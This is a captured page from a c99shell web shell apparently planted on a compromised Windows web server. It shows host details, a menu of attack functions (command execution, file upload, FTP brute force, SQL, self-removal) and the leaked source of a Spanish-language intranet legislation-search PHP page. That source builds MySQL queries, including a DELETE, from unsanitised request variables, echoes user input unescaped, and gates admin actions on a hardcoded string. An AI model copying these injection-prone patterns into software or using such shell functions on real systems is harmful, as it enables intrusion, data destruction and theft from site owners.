!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpscripts\   drwxrwxrwx
Free 8.81 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     legis1.php (17.45 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>mi DAMA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #000000;
}
body {
    background-color: #333333;
}
.Estilo5 {
    color: #FFFFFF;
    font-weight: bold;
}
a:link {
    color: #333333;
    text-decoration: none;
}
a:visited {
    color: #333333;
    text-decoration: none;
}
a:active {
    color: #FF3300;
    text-decoration: none;
}
a:hover {
    text-decoration: underline;
}
.Highlight {background-color:#999999}
.Normal{background-color:#666666}
.Estilo48 {font-size: 18}
.Estilo49 {font-size: 12px}
.Estilo54 {font-family: Verdana, Arial, Helvetica, sans-serif}
.Estilo55 {font-size: 12}
.style1 {color: #999999}
.style2 {
    color: #FFFFFF;
    font-size: 20px;
}
input {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
    color: #666666;
    background-color: #F3F3F3;
    border: 1px solid #996600;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<style type="text/css">
<!--
select {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
    color: #666666;
}
-->
</style>
</head>

<body onload="MM_preloadImages('file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/MiDAMA_RO_002.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/BogBann_E05b.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/Intra_dam01b.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_02b.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_03b.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_04b.jpg','file:///A|/Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/BogBann_D02.jpg')">
<div align="center"> <a href="reqintranet.php"><img src="imadam/charco03.jpg" width="760" height="100" border="0"></a> 
  <table width="760" border="0" cellpadding="1" cellspacing="0">
    <tr bgcolor="#666666">
      <td width="65" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center" class="Estilo56"><a href="reqintranet.php?user=<?php echo $user?>"><font color="#FFFFFF">INICIO</font></a></div></td>
      <td width="75" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqnoticias2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">NOTICIAS</font></span></a></div></td>
      <td width="78" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqsistemasform2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">SOPORTE</font></span></a></div></td>
      <td width="102" bgcolor="#CCCC99" ><div align="center"><a href="reqlegis.php?user=<?php echo $user?>"><span class="Estilo64"><font color="#000000">LEGISLACI&Oacute;N</font></span></a></div></td>
      <td width="90" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqdamaweb.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">DAMA 
          WEB</font> </span></a></div></td>
      <td width="81" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqlinks.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LINKS</font> 
          </span></a></div></td>
      <td width="81" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqrediseno.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">REDISE&Ntilde;O</font></span></a></div></td>
      <td width="72" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqparticipate.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">PARTICIPE</font></span></a></div></td>
      <td width="78" bgcolor="#666666" class="Normal" onmouseover="this.className='Highlight'" onmouseout="this.className='Normal'"><div align="center"><a href="reqindice.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">INDICE</font></span></a></div></td>
    </tr>
  </table>
</div>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody><tr bgcolor="#FFFFFF">
    <td bgcolor="#CCCC99">&nbsp;</td>
    </tr>
</tbody></table>
<table width="760" height="276" border="0" align="center" cellpadding="0" cellspacing="20" bgcolor="#CCCC99">
  <tr> 
    <td bordercolor="#FFCC00" bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="0" cellpadding="8">
        <tr> 
          <td><table width="100%" border="1" cellpadding="5" cellspacing="0" bordercolor="#FFFFFF">
              <tr> 
                <?php
    $contrx 
"0";
$sed = isset($user);
if (
$sed == false) {
    exit;
}else{
if (
$user == "email") {
//require('conexion2.php');
//$stmt = Ociparse($c1, " SELECT EU_USERNAME FROM envista.env_users where EU_USERNAME='$user'");
//$result = OCIExecute($stmt);
//if ($result == false) {
//exit;
//}else{
//$cont = 0;
//while (OCIFetchInto($stmt, $value1)) {
//foreach ($value1 as $val1)
//{
//$cont++;
//}}
if ($user == "guest") {
$cont  0;
}else{
$cont  1;
}
if (
$cont == 1) {
$contrx "xyz976";
?>
                <td bordercolor="#CCCCCC" bgcolor="#F2F2F2"> <table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr> 
                      <td> <div align="center"><a href="reqlegis.php?user=<?php echo $user?>">Volver 
                          a Buscar...</a></div></td>
                    </tr>
                  </table></td>
                <td bordercolor="#CCCCCC" bgcolor="#FFFFF9"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr> 
                      <td> <div align="center"><a href="reqlegis2.php?user=<?php echo $user?>">Agregar 
                          Normas...</a></div></td>
                    </tr>
                  </table></td>
                <td bordercolor="#CCCCCC" bgcolor="#FFFFF9"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr> 
                      <td> <div align="center"><a href="reqlegis3.php?user=<?php echo $user?>">Agregar 
                          Entidades...</a></div></td>
                    </tr>
                  </table></td>
                <?php
//}}
//$c2 = OciLogoff($c1);
}
}}
?>
              </tr>
              <tr bordercolor="#FFFFFF"> 
                <td width="100%" colspan="3" bgcolor="#FFFFF9"> 
                  <p><font size="4"><strong>Resultados de la b&uacute;squeda...</strong></font></p>
                  <?php 
        
require('conexion3.php');
        
$xsr = isset($acc);
        if (
$xsr == true and $acc == 2) {
        
$query ="DELETE FROM legis WHERE id='$id'";
        
$result mysql_query($query,$db);
        require(
'legis6.php');
        exit;
        }
        
        
        if (
$tipo == "0") {
        
$tipo "%";
        }
        if (
$mes == "00") {
        
$mes "%";
        }
        if (
$entidad == "00") {
        
$entidad "%";
        }
        if (
$numero == "") {
        
$numero "%";
        }
        if (
$ano == "" or $ano == "Todos") {
        
$ano "%";
        }
        
$buscara $buscar;
        
$buscar strtolower($buscar);
        
$veri substr_count($buscar"\"");
        
        if (
$veri != 0) {
        
$buscard str_replace ("\""""$buscar);
        
$buscard str_replace ("\\"""$buscard);
        
$en 0;
        }else{
        
$buscard str_replace (" ""%"$buscar);
        
$en 1;
        }
        
//echo $mes;
        //echo $entidad;
        //echo $numero;
              
            
if ($buscar != "") {
            
$consul "SELECT *
            FROM legis where tipo LIKE '
$tipo' and mes LIKE '$mes' and entidad LIKE '$entidad' and fecha LIKE '%$ano%' and numero LIKE '%$numero%' and texto LIKE '%$buscard%'"
            
" order by tipo, numero";
            }else{
            
$buscar "";
            
$consul "SELECT *
            FROM legis where tipo LIKE '
$tipo' and mes LIKE '$mes' and entidad LIKE '$entidad' and fecha LIKE '%$ano%' and numero LIKE '%$numero%'"
            
" order by tipo, numero";
            }
            
$result mysql_query($consul,$db);
            
$num_filas mysql_num_rows($result);
        
$frx = isset($ini);
        if (
$frx == false) {
        
$ini 1;
        }
        
$lim $ini 19;
        if (
$num_filas >= 1) {
        
?>
                  <p>Se encontraron <font color="#FF6699"><strong><?php echo $num_filas?></strong></font> 
                    normas que tienen este criterio de b&uacute;squeda: <font color="#0066CC"><strong><?php echo $buscar?> 
                    <br>
                    &gt;&gt; </strong></font><font color="#000000">Se presentan 
                  del <strong><font color="#FF6699"><?php echo $ini?></font> 
                  </strong>al <strong><font color="#FF6699"> 
                  <?php
        
if ($num_filas <= $lim) {
        echo 
$num_filas;
        echo 
"</font></strong></font></p>";
        }else{
        echo 
$lim;
        echo 
"</font></strong>. (<a href=\"";
        echo 
"reqlegis1.php?user=$user&tipo=$tipo&numero=$numero&mes=$mes&ano=$ano&entidad=$entidad&buscar=$buscara&ini=$lim";
        echo 
"\">Ver "
        echo 
"m&aacute;s resultados</a>).</font></p>";
        }
        
        }else{
        
?>
                  <p>Lo sentimos, no se encuentr&aacute;n normas contenidas en 
                    este sistema que tengan este criterio de b&uacute;squeda: 
                    <font color="#0066CC"><strong><?php echo $buscar?> </strong><font color="#000000">Por 
                    favor intente nuevamente.</font></font></p>
                  <?php
        
}
        
?>
                  <table width="100%" border="0" cellspacing="0" cellpadding="5">
                    <tr bgcolor="#F9EB8A"> 
                      <td width="20%"> <div align="center"><strong>Nombre</strong></div></td>
                      <td width="70%"> <div align="center"><strong>T&iacute;tulo 
                          y T&iacute;tulo Principal</strong></div></td>
                      <td width="10%"> <div align="center"><strong>Acc.</strong></div></td>
                    </tr>
                    <?php
        $contador 
1;
        while (
$myrow mysql_fetch_array($result))
            {
            if (
$contador >= $ini and $contador <= $lim) {
            
$idr $myrow["id"];
            
$numeror $myrow["numero"];
            
$fechar $myrow["fecha"];
            
$entidadr $myrow["entidad"];
            
$tipor $myrow["tipo"];
            
$etiquetar $myrow["etiqueta"];
            
$textor $myrow["texto"];
            
$titulor $myrow["titulo"];
            
$linkr $myrow["link"];
            
$mesr $myrow["mes"];
    
$prese$tipor " " $numeror " de " $fechar;
    
?>
                    <tr bgcolor="#FAFEE2"> 
                      <td valign="top" class="textopequenoCopia"><?php echo $prese?></td>
                      <td valign="top" bgcolor="#FAFEE2"><span class="textopequenoCopia"><a href="reqlegis4.php?id=<?php echo $idr?>&user=<?php echo $user?>&str=<?php 
          
if ($en == 0) {
          echo 
$buscard;
          }else{
          echo 
$buscar;
          }
          
           
?>&en=<?php echo $en?>"><?php echo $titulor?></a></span><br>
                        <font color="#666666">Temas:</font> <span class="textopequenoCopia"><?php echo $etiquetar?></span></td>
                      <?php
            
if ($contrx == "xyz976" and $user=="EMAIL")
            {
            
?>
                      <td><div align="center"><a href="reqlegis1.php?id=<?php echo $idr?>&user=<?php echo $user?>&acc=2"><img src="bor.gif" alt="Borrar..." width="20" height="20" border="0"></a> 
                          <a href="reqlegis5.php?id=<?php echo $idr?>&user=<?php echo $user?>"><img src="edi.gif" alt="Borrar..." width="20" height="20" border="0"></a></div></td>
                      <?php
          
}else{
          echo 
"<td><div align=\"center\"></div></td>";
          }
          
?>
                    </tr>
                    <?php
        
}
        
$contador++;
        }
        
?>
                  </table>
                  <p align="center">Todas las normas encontradas son legislaci&oacute;n 
                    vigente.</p>
                  </font></strong></font></td>
              </tr>
            </table></td>
        </tr>
      </table>
      </td>
  </tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody><tr bgcolor="#003399">
    <td bgcolor="#CCCC99" width="544"><div class="Estilo14 style1" align="center">diseño: alvaro moreno - desarrollo: nicolás rey </div></td>
    <td bgcolor="#fee415" width="216"><div align="center"> 
          <p><img src="midama3_files/bogsin1yellow_sml.jpg" width="120" height="44"></p>
    </div></td>
  </tr>
</tbody></table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody><tr bgcolor="#003399">
    <td bgcolor="#ffcc00" width="545"><div align="center"></div></td>
    <td bgcolor="#CC0000" width="215">&nbsp;</td>
  </tr>
</tbody></table>
<table width="760" border="0" align="center" cellpadding="1" cellspacing="0" bgcolor="#666666">
  <tr bgcolor="#2656A2">
    <td width="65" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center" class="Estilo56"><a href="reqintranet.php?user=<?php echo $user?>"><font color="#FFFFFF">INICIO</font></a></div></td>
    <td width="75" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqnoticias2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">NOTICIAS</font></span></a></div></td>
    <td width="78" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqsistemasform2.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">SOPORTE</font></span></a></div></td>
    <td width="102" bgcolor="#CCCC99"><div align="center"><a href="reqlegis.php?user=<?php echo $user?>"><span class="Estilo64"><font color="#000000">LEGISLACI&Oacute;N</font></span></a></div></td>
    <td width="90" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqdamaweb.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">DAMA 
        WEB</font> </span></a></div></td>
    <td width="81" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqlinks.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">LINKS 
        </font></span></a></div></td>
    <td width="81" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqrediseno.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">REDISE&Ntilde;O</font></span></a></div></td>
    <td width="72" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqparticipate.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">PARTICIPE</font></span></a></div></td>
    <td width="78" bgcolor="#2656A2" class="Estilo56" onmouseover="this.className='Highlight'" onmouseout="this.className='Estilo56'"><div align="center"><a href="reqindice.php?user=<?php echo $user?>"><span class="Estilo56"><font color="#FFFFFF">INDICE</font></span></a></div></td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div align="center"></div>
<div align="center"></div>
<p>&nbsp;</p>
</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--